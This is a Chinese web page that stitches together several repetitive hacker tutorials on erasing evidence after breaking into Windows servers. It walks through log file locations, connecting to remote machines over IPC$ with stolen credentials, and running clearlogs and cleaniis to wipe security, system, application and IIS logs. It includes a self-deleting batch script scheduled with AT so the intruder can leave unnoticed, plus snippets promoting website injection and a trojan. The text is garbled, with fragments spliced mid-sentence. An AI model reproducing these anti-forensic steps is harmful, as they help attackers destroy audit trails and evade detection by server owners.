下面是小編整理的手把手教你如何清理入侵痕跡,歡迎大家閱讀借鑒,并有積極分享。如果這9篇文章還不能滿足您的需求,您還可以在本站搜索到更多與手把手教你如何清理入侵痕跡相關的文章。
(資料圖片僅供參考)
入侵后的三個重要痕跡分別是:應用程序日志、安全日志 和系統日志,
手把手教你如何清理入侵痕跡
。 以下日志在注冊表里的鍵: 應用程序日志,安全日志,系統日志,DNS服務器日志 DNS日志默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大?0踩日志文
手把手教你入侵
,
很入侵之后做的事情。 需要的工具: 很好的: radmin.EⅩE 掃描工具: retinarpcdcom.EⅩE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟telnet工具:telnet.vbe opentelnet.EⅩE resumetelnet.E
。安全日志文件 復制內容到剪貼板 代碼:%systemroot%\system32\config\SecEvent.EVT
系統日志文件 復制內容到剪貼板 代碼:%systemroot%\system32\config\SysEvent.EVT
應用程序日志文件 復制內容到剪貼板 代碼:%systemroot%\system32\config\AppEvent.EVT
FTP日志默認位置 復制內容到剪貼板 代碼:%systemroot%\system32\logfiles\msftpsvc1\,默認每天一個
WWW日志默認位置 復制內容到剪貼板 代碼:%systemroot%\system32\logfiles\w3svc1\
默認每天一個日志
以上日志在注冊表里的鍵: 應用程序日志,安全日志,系統日志,DNS服務器日志,
它們這些LOG文件在注冊表中的: 復制內容到剪貼板 代碼:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
鑰匙(表示成功)和鎖(表示當用戶在做什么時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄、注銷失敗
怎樣刪除這些日志: 通過上面,得知日志文件通常有某項服務在后臺保護,除了系統日志、安全日志、應用程序日志等等,它們的服務是Wind
os的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動后,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日志和系統日志了,守護這些日志的服務是Event Log,試著停掉它! 復制內容到剪貼板 代碼:D:\SERVER\system32\LogFiles\W3SVC1>net sto
p eventlog 這項服務無法接受請求的“暫停” 或“停止” 操作。
怎么清除系統日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
===================================
1.系統日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法: 復制內容到剪貼板 代碼:Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應用程序日志
-sec = 安全日志
-sys = 系統日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: 復制內容到剪貼板 代碼:net use \\ip\ipc$ 密碼/user:用戶名
** 然后開始清除: 方法 復制內容到剪貼板 代碼:clearlogs \\ip -app
這個是清除遠程計算機的應用程序日志 復制內容到剪貼板 代碼:clearlogs \\ip -sec 這個是清除遠程計算機的安全日志
復制內容到剪貼板 代碼:clearlogs \\ip -sys 這個是清除遠程計算機的系統日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除. 方法: 復制內容到剪貼板 代碼:clearlogs -app
這個是清除遠程計算機的應用程序日志 復制內容到剪貼板 代碼:clearlogs -sec
這個是清除遠程計算機的安全日志 復制內容到剪貼板 代碼:clearlogs -sys
這個是清除遠程計算機的系統日志
安全日志已經被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務. 讓自動運行. 之后你就可以
離開你的肉雞了.
例如建立一個 c.bat 復制內容到剪貼板 代碼:rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:\c.bat
之后你就可以安全離開了. 這樣才更安全一點.
===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法: 復制內容到剪貼板 代碼:iisantidote
iisantidote stop
stop opiton will stop iis before clearing the files and restart it after
exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數
什么意思呢??我來給大家舉個例子吧: 復制內容到剪貼板 代碼:cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄. -----推薦使用這種方法 復制內容到剪貼板 代碼:cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/
這個表示清除這個目錄里面的所以的日志 復制內容到剪貼板 代碼:c:\winnt\system32\logfiles\w3svc1
代表是iis日志的位置(windows nt/2000) 這個路徑可以改變 復制內容到剪貼板 代碼:c:\windows\system32\logfiles\w3svc1
代表是iis日志的位置(windows xp/) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑 再來看一下
我們的ip(192.168.0.1)已經沒有了.
已經全部清空.
同樣這個也可以建立批處理. 方法同上面的那個.
===================================
3.清除歷史記錄及運行的日志:
cleaner.exe
直接運行就可以了.
===================================
4.察看blackice的日志.
這個地方我們可以清除的看到 防火墻的日志.
這個表示 有人發過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過端口 80 掃描iis
病毒 nimda
這里需要很多的計算機協議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機
count 代表次數 intruder 是對方的ip event 是通過什么方式(協議) 掃描或者想入侵的
time表示時間
說到入侵網站,最常見的就漏洞注入攻擊了,很多網站都具有這樣的漏洞,
手把手教你入侵網站 菜鳥必看
,
注入漏洞也是最有效也是最簡單的入侵網站的途徑。網絡安全就是網絡攻防的一個過程,知道如何攻的才能知道如何防守。下面筆者就自己的親身經歷給大家介紹一下網站漏洞注入攻擊。 先說一下
這道快餐是專門為從來沒有通過 網絡 進入過對方 計算機 的網絡 新手 們準備的,主要使用的 軟件 就是著名的國產 木馬 冰河2.2,所以,如果你已經使用過冰河2.2,就不必跟著我們往下走了,
手把手教你入侵個人計算機 菜鳥必讀
,
其他有興趣的網絡新手們,Let"s go! 第一步 下載必備的 工具 軟件。1
1自定義刪除(即想刪除哪條歷史記錄就刪除哪條)
在百度搜索網頁里的搜索欄中,點擊鼠標左鍵兩次,會出現以前搜索過的歷史記錄,然后用鼠標指向你想要刪除的歷史記錄(注意:是指向,不要點擊),這時這條歷史記錄會深色顯示,再點擊DEL鍵,就可以刪除這一條歷史記錄了。這種方法你可以隨心所欲,想刪哪條都可以。
2完全刪除法
在桌面用鼠標右鍵點擊IE圖標,再點屬性。選上面的“內容”按鈕。再點下面的“自動完成”按鈕。然后點擊“清除表單”,就可以把以前的所有歷史記錄刪掉,
如果想以后也把錄用的內容不留歷史記錄,則把“表單”前面的勾去掉。
3用修復工具,比如上網助手..
刪除搜索框中的歷史記錄
如何清除搜索框內的搜索歷史記錄?
答:這是網頁瀏覽器的一項功能。進入IE瀏覽器的相關菜單選項設置:
?如果您使用IE4.0瀏覽器,則由“查看→internet選項→內容→自動完成→清除表單→完成”;
?如果您使用IE5.0及以上版本的瀏覽器,則由“工具→internet選項→內容→自動完成→清除表單→完成”;
?如果您希望IE瀏覽器以后不再記錄查詢過的內容,請在“自動完成”設置頁面內把“表單”前的選項勾去掉。
來源:刀客城
自己總結的,也不知道對不對
打開事件管理,然后在左邊右鍵,清除所有的,然后打開C盤,C:\WINDOWS\system32\LogFiles
目錄下每個文件加內有TXT的,刪了,或打開,把的東西修改了,如果沒法刪,那就在CMD下輸入
net stop 加目錄名字,但是這里HTTPERR只輸入HTTP,
入侵服務器之后痕跡的清理
,
W什么的目錄不加后面的數字,不然出錯,沒法停止,然后就可以刪了,下來我們把一個工具放到服務器上,
clear3389.exe
百度有,用法是,CMD下,輸入這個軟件的路徑加空格,加clear3389.exe cleaniislog . 加你的IP就可以了
這樣基本就可以清除了
清理你入侵后的三個重要痕跡
應用程序日志
安全日志
系統日志
DNS日志默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大小,安全日志文件:%systemroot%system32configSecEvent.EVT
系統日志文件:%systemroot%system32configSysEvent.EVT
應用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默認位置:%systemroot%system32logfilesmsftpsvc1,默認每天一個
WWW日志默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日志
以上日志在注冊表里的鍵: 應用程序日志,安全日志,系統日志,DNS服務器日志,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
鑰匙(表示成功)和鎖(表示當用戶在做什么時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄注銷失敗
怎樣刪除這些日志: 通過上面,得知日志文件通常有某項服務在后臺保護,除了系統日志安全日志應用程序日志等等,它們的服務是Windos的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動后,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日志和系統日志了,守護這些日志的服務是Event Log,試著停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務無法接受請求的“暫停” 或“停止” 操作,
怎么清除系統日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻 Blackice的日志
netstat -an 表示的什么意思
--------------------------------------------------------------------------------------------------------------
1. 系統日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>
-app = 應用程序日志
-sec = 安全日志
-sys = 系統日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \ip -app 這個是清除遠程計算機的應用程序日志
clearlogs \ip -sec 這個是清除遠程計算機的安全日志
clearlogs \ip -sys 這個是清除遠程計算機的系統日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除.??方法:
clearlogs??-app 這個是清除遠程計算機的應用程序日志
clearlogs
今天,來教大家清理你入侵后的三個重要痕跡,包括應用程序日志,安全日志,系統日志。
DNS日志默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系統日志文件:%systemroot%system32configSysEvent.EVT
應用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默認位置:%systemroot%system32logfilesmsftpsvc1,默認每天一個
WWW日志默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日志
以上日志在注冊表里的鍵: 應用程序日志,安全日志,系統日志,DNS服務器日志,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
鑰匙(表示成功)和鎖(表示當用戶在做什么時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄注銷失敗
怎樣刪除這些日志: 通過上面,得知日志文件通常有某項服務在后臺保護,除了系統日志安全日志應用程序日志等等,它們的服務是Windos2000的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動后,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日志和系統日志了,守護這些日志的服務是Event Log,試著停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務無法接受請求的“暫停” 或“停止” 操作。
怎么清除系統日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
--------------------------------------------------------------------------------------------------------------
1.系統日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>
-app = 應用程序日志
-sec = 安全日志
-sys = 系統日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \ip -app 這個是清除遠程計算機的應用程序日志
clearlogs \ip -sec 這個是清除遠程計算機的安全日志
clearlogs \ip -sys 這個是清除遠程計算機的系統日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除.??方法:
clearlogs??-app 這個是清除遠程計算機的應用程序日志
clearlogs??-sec 這個是清除遠程計算機的安全日志
clearlogs??-sys 這個是清除遠程計算機的系統日志
安全日志已經被清除.Success: The log has been cleared??成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務. 讓自動運行. 之后你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off??可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:c.bat
之后你就可以安全離開了. 這樣才更安全一點.
--------------------------------------------------------------------------------------------------------------
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote
iisantidote
stop opiton will stop iis before clearing the files and restart it after
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數
什么意思呢??我來給大家舉個例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄.????-----推薦使用這種方法
cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
這個表示清除這個目錄里面的所以的日志
c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 這個路徑可以改變
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑????再來看一下
我們的ip(192.168.0.1)已經沒有了.
已經全部清空. 同樣這個也可以建立批處理. 方法同上面的那個.
★ 教你如何清理電腦上網痕跡
★ 手把手教你如何優化簡歷
★ 手把手教你學文言文斷句
★ 手把手教你給DB2打補丁
★ 6個步驟手把手教你畫眼影
★ 手把手教你打造超酷的勁舞團QQ空間
★ 痕跡記敘文
★ 辦公用房清理自查報告
★ 資產清理會議紀要
★ 清理辦公用房自查報告
標簽:
